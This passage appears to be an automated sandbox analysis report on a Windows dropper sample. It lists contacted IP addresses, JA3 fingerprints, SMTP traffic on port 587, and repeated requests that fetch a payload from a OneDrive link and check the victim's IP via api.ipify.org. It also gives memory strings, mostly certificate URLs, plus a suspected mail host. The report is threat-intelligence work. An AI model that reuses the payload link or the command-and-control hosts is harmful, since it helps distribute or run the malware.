Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 185.56.136.50 185.56.136.50
Source: Joe Sandbox View	IP Address: 173.231.16.75 173.231.16.75

Source: Joe Sandbox View

ASN Name: SECUREDSERVERS-EU SECUREDSERVERS-EU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.56.136.50:587

Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.oripam.xyz
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
